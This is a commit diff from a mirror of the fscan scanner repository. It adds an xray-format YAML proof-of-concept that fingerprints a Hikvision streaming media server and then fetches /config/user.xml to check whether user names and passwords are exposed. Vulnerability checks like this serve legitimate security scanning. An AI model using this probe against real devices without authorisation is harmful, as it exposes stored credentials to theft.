mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-27 05:31:53 +08:00
优化xray解析模块,支持groups、新增poc
This commit is contained in:
@@ -0,0 +1,17 @@
|
||||
name: poc-yaml-hikvision-info-leak
|
||||
rules:
|
||||
- method: GET
|
||||
path: /
|
||||
follow_redirects: false
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"<TITLE>流媒体管理服务器</TITLE>") && response.body.bcontains(b"海康威视")
|
||||
- method: GET
|
||||
path: /config/user.xml
|
||||
follow_redirects: false
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"<user name=\"") && response.body.bcontains(b" password=\"")
|
||||
detail:
|
||||
author: tangshoupu
|
||||
info: Hikvision ikvision-info-leak
|
||||
links:
|
||||
- https://www.seebug.org/vuldb/ssvid-91762
|
||||
Reference in New Issue
Block a user